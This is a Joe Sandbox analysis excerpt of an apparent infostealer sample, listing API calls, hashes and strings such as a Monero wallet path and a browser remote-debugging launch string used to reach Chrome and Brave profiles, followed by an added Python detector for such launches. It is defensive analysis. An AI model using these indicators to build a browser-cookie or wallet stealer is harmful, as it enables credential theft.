                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: a97b29684fc1ec46d454ea12b22d6a024f3818ded766383dcd98a934a0ef298f
                                    • Instruction ID: a3befb32eea591aaaccb6211b1e78bebf7770c2129bf1db1c7ec22c554671bcc
                                    • Opcode Fuzzy Hash: a97b29684fc1ec46d454ea12b22d6a024f3818ded766383dcd98a934a0ef298f
                                    • Instruction Fuzzy Hash: 1B0186B1A18349ABCB00DF99DD45BAEFBBCF704711F10011AF515E2680D7745A009BA1
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                    • ExitProcess.KERNEL32 ref: 00681143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: d761a54e44f564db10fc5fd87f67f3115a737384af3980b77ecd367ba06de8f1
                                    • Instruction ID: e46c2dfeff21c701599765260bdb165f33b8b37d84712069e6d9feaddad16358
                                    • Opcode Fuzzy Hash: d761a54e44f564db10fc5fd87f67f3115a737384af3980b77ecd367ba06de8f1
                                    • Instruction Fuzzy Hash: 6EE0867095D308FBE7106BD1AC0EB4CB66C9B04B06F100144F7087A1D0CAB426409758
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: a3769ad367ae672d2ab75541846b7383bda9458069db54186381d65cd12ad4d0
                                    • Instruction ID: 943d05fda76e73e54a9184115b1f9d2122b2e4bde68744f404d736d417d048f1
                                    • Opcode Fuzzy Hash: a3769ad367ae672d2ab75541846b7383bda9458069db54186381d65cd12ad4d0
                                    • Instruction Fuzzy Hash: 29F0E2B1645308BBEB14AAB4AC59FAEB79CE706B05F300548F500E7280D9719F009BA4
                                    APIs
                                      • Part of subcall function 00697A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                      • Part of subcall function 00697A70: RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                      • Part of subcall function 00697A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                      • Part of subcall function 006979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                      • Part of subcall function 006979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                      • Part of subcall function 006979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                    • ExitProcess.KERNEL32 ref: 006811C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 3550813701-0
                                    • Opcode ID: 26f0f2a927c5ea9fe30eb46b2b00b6eca6f14d611732ce13c48efc69237840b9
                                    • Instruction ID: 6a015e443864c016659272b208f35cae0f01017529b5f0456daecf5ee8722bd8
                                    • Opcode Fuzzy Hash: 26f0f2a927c5ea9fe30eb46b2b00b6eca6f14d611732ce13c48efc69237840b9
                                    • Instruction Fuzzy Hash: 76E0ECA592830556CE5073B67C0AB6A328E5B1620BF040828F904C7646ED25E9015369
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2F,00000000,?,?,?,006A1450,006A0B2E), ref: 0068BEC5
                                    • StrCmpCA.SHLWAPI(?,006A1454), ref: 0068BF33
                                    • StrCmpCA.SHLWAPI(?,006A1458), ref: 0068BF49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C8A9
                                    • FindClose.KERNEL32(000000FF), ref: 0068C8BB
                                    Strings
                                    • Google Chrome, xrefs: 0068C6F8
                                    • Preferences, xrefs: 0068C104
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C3B2
                                    • \Brave\Preferences, xrefs: 0068C1C1
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C534
                                    • Brave, xrefs: 0068C0E8
                                    • --remote-debugging-port=9229 --profile-directory=", xrefs: 0068C495
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: 92115a833a96a2558fcbfb734f120e0baff7bf83c6e3771a6a7233c2bf3cd96f
                                    • Instruction ID: 32a2fb23922bbd81f412af7cf3c48c153bce8749098574a7542329b36dc04829
                                    • Opcode Fuzzy Hash: 92115a833a96a2558fcbfb734f120e0baff7bf83c6e3771a6a7233c2bf3cd96f
                                    • Instruction Fuzzy Hash: 375233725141089BCF54FBA0DD96EFE737EAF54301F40469CB50AA6491EE306B48CFAA
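The record above lists the command-line fragment `--remote-debugging-port=9229 --profile-directory="` next to the strings `Brave`, `Google Chrome` and `Preferences`. That Chromium switch opens the DevTools protocol on a local TCP port, so a process-creation log is the natural place to look for it. The following is an added example, not code from the Joe Sandbox report or from the sample: it takes process-creation events as plain dicts with `Image`, `ParentImage` and `CommandLine` fields (a constructed layout, not any product's schema) and flags Chromium-family browsers started with a remote-debugging switch. The browser list and the sample events are assumptions made for the example. Note that 9229 is also the default Node.js inspector port, which is why the check keys on the browser image rather than on the port number.

```python
"""Flag Chromium-family browsers launched with a DevTools remote-debugging switch.

Added example for the sandbox record above; the event layout and the sample
events are constructed for this example and do not come from the report.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Executable names of Chromium-based browsers (assumption: extend for your estate).
CHROMIUM_BROWSERS = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}

# Chromium switches that expose the DevTools protocol to other processes.
DEVTOOLS_SWITCHES = {"--remote-debugging-port", "--remote-debugging-pipe"}

# One token is a run of unquoted text and/or "quoted text", so that
# --profile-directory="Profile 1" stays together as a single token.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')


@dataclass
class Finding:
    browser: str            # basename of the launched browser
    switch: str             # which DevTools switch was present
    port: Optional[int]     # value of --remote-debugging-port, if numeric
    profile: Optional[str]  # value of --profile-directory, if given
    parent: str             # basename of the parent process


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, dropping the double quotes."""
    return [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]


def analyze(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding if a Chromium browser was started with a DevTools switch."""
    browser = ntpath.basename(event.get("Image", "")).lower()
    if browser not in CHROMIUM_BROWSERS:
        return None  # node --inspect also defaults to 9229; only browsers matter here
    switch = None
    profile = None
    port = None
    for tok in tokenize(event.get("CommandLine", ""))[1:]:
        key, _, val = tok.partition("=")
        key = key.lower()
        if key in DEVTOOLS_SWITCHES:
            switch = key
            if key == "--remote-debugging-port" and val.isdigit():
                port = int(val)
        elif key == "--profile-directory":
            profile = val
    if switch is None:
        return None
    return Finding(browser, switch, port, profile,
                   ntpath.basename(event.get("ParentImage", "")).lower())


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Run analyze() over a batch of events and keep the hits."""
    return [f for f in (analyze(e) for e in events) if f is not None]


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
BRAVE = r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
DROPPER = r"C:\Users\victim\AppData\Local\Temp\file.exe"

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": CHROME, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{CHROME}" --profile-directory="Default"'},
    {"Image": CHROME, "ParentImage": DROPPER,
     "CommandLine": f'"{CHROME}" --remote-debugging-port=9229 --profile-directory="Default"'},
    {"Image": BRAVE, "ParentImage": DROPPER,
     "CommandLine": f'"{BRAVE}" --remote-debugging-port=9229 --profile-directory="Profile 1"'},
    {"Image": CHROME, "ParentImage": CHROME,
     "CommandLine": f'"{CHROME}" --type=renderer --lang=en-US'},
    {"Image": r"C:\Program Files\nodejs\node.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "node --inspect=9229 app.js"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

A non-browser parent (here the dropper in `%TEMP%`) launching a browser with the switch is the pairing worth alerting on; a browser relaunching itself with `--type=renderer` carries no DevTools switch and is ignored.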
                                    APIs
                                    • wsprintfA.USER32 ref: 00693B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00693B33
                                    • lstrcat.KERNEL32(?,?), ref: 00693B85
                                    • StrCmpCA.SHLWAPI(?,006A0F58), ref: 00693B97
                                    • StrCmpCA.SHLWAPI(?,006A0F5C), ref: 00693BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00693EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00693ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: f42edc3afa26fbb105006d1e5297e49049c38b8c403e4747a9cfe9048028463f
                                    • Instruction ID: a5c0931da7ed5f9bf7c3a0a6f2d742542be74b7af213c0222920ad19a07d53c2
                                    • Opcode Fuzzy Hash: f42edc3afa26fbb105006d1e5297e49049c38b8c403e4747a9cfe9048028463f
                                    • Instruction Fuzzy Hash: 17A161B1A142189FDF64EFA4DC85FEA737DAB45301F044588B60D96681EB709B84CF61
                                    APIs
                                    • wsprintfA.USER32 ref: 00694B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                    • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                    • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 4e6509e5fe01c721592447f8d6c02afe14882dd925436d506c85f5188b766350
                                    • Instruction ID: 759ef0fc196da9081dddc4e95c99c6138c6be283f2ea115ce8cdc6bb615b01af
                                    • Opcode Fuzzy Hash: 4e6509e5fe01c721592447f8d6c02afe14882dd925436d506c85f5188b766350
                                    • Instruction Fuzzy Hash: 68614771914218ABDF24EBE1EC45EEAB37DAB49701F00468CF60996144EF70AB858F95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006947D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006947D7
                                    • wsprintfA.USER32 ref: 006947F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0069480D
                                    • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 0069483B
                                    • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00694851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 006948DB
                                    • FindClose.KERNEL32(000000FF), ref: 006948F0
                                    • lstrcat.KERNEL32(?,0142E370), ref: 00694915
                                    • lstrcat.KERNEL32(?,0142D138), ref: 00694928
                                    • lstrlen.KERNEL32(?), ref: 00694935
                                    • lstrlen.KERNEL32(?), ref: 00694946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 9b6c0ad96ef6db2d2aa311b6e03762d7f82bb03af4aae3ee053d01b8bd3f7f3f
                                    • Instruction ID: 7fe9da26e15b3538f9d8354fe9819e8de4a160b39c572cdd911777198cfc8994
                                    • Opcode Fuzzy Hash: 9b6c0ad96ef6db2d2aa311b6e03762d7f82bb03af4aae3ee053d01b8bd3f7f3f
                                    • Instruction Fuzzy Hash: CC5164B1518208ABCB60EBB0EC89FEDB37DAB58301F404588B61996150EE74DB85DF91
                                    APIs
                                    • wsprintfA.USER32 ref: 00694113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0069412A
                                    • StrCmpCA.SHLWAPI(?,006A0F94), ref: 00694158
                                    • StrCmpCA.SHLWAPI(?,006A0F98), ref: 0069416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 006942BC
                                    • FindClose.KERNEL32(000000FF), ref: 006942D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
